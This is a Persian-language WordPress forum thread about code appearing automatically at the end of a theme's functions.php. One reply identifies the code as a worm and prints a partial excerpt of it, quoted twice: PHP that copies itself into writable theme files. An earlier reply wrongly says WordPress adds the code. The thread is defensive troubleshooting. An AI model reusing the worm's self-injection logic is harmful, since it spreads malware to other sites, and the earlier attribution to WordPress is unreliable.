رفتن به مطلب

مشکل با اضافه شدن خودکار کدها در فایل functions.php

پست های پیشنهاد شده

سلام

وقتی پوسته وردپرس رو در حالتی که دیباگ فعاله انتخاب میکنم با اخطارهای زیر روبرو میشم :

11.jpg

البته قبلش فایل فاکنشن رو چک کردم چیزی به جز کدهایی که خودم بهش اضافه کرده بودم نبود ولی بعد از فعال کردن پوسته کدهای زیر به آخر فایل فانکشن به صورت اتوماتیک اضافه شد ... :

ggg.jpg

میخوام بدونم باید چیکار کنم که این کدها اتوماتیک به فانکشن اضافه نشن ...

ممنون

لینک به ارسال

این کدها رو وردپرس اضافه میکنه

میتونید حذف کنید

و همچنین برای تکرار نشدن این مسئله permission نوشتن را از فایل بگیرید

لینک به ارسال

ممنون آقا پارسا . راستش من میخوام قالبو بدم به یه نفر دیگه ... میخوام وقتی قالبو فعال میکنه این کدها اضافه نشن .. آیا میشه توی خود پوسته از کدی استفاده کرد که این کدها اتوماتیک لود نشن ؟؟

یه سوال دیگه هم داشتم :

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟

ویرایش شده توسط 021
لینک به ارسال

سلام

این کدها Worm هستند:

<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
.
.
.
.
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.

لینک به ارسال

درست شد ممنون آقای حسینی ,

یه سوال دیگه هم داشتم:

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه؟

یعنی ممکنه از کپی و پیس کردن تگها باشه ؟

لینک به ارسال

یه سوال دیگه هم داشتم :

بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟

وجود تابع فوتر:

<?php wp_footer(); ?>

قبل از بسته شدن تگ های body و html و تابع هدر :

<?php wp_head(); ?>

قبل از بسته شدن تگ head را چک کنید.

لینک به ارسال
  • 1 سال بعد...

سلام

این کدها Worm هستند:

<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
.
.
.
.
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>

فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.

دوست عزیز از پاسخ بسیار دقیق و راهنمایی شما بسیار بسیار سپاسگزارم

راستش من هم دچار این مشکل بودم و اصلا نمی تونستم جلوی تکثیر این worm رو بگیرم و با راهنمایی شما این کار انجام شد

فقط می خوام بدونم آیا این کرم فایلهای دیگر رو هم دستکاری می کنه یا نه فقط فایل فانکشن رو تغییر میده؟؟؟؟؟

یه سوال دیگه هم اینکه این مشکل رو ریشه ای چطور می تونم حل کنم؟؟ یعنی خود worm رو پاکسازی کنم تا بعدا دوباره مشکلی ایجاد نشه؟؟؟؟

خیلی ممنون

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• اضافه کردن...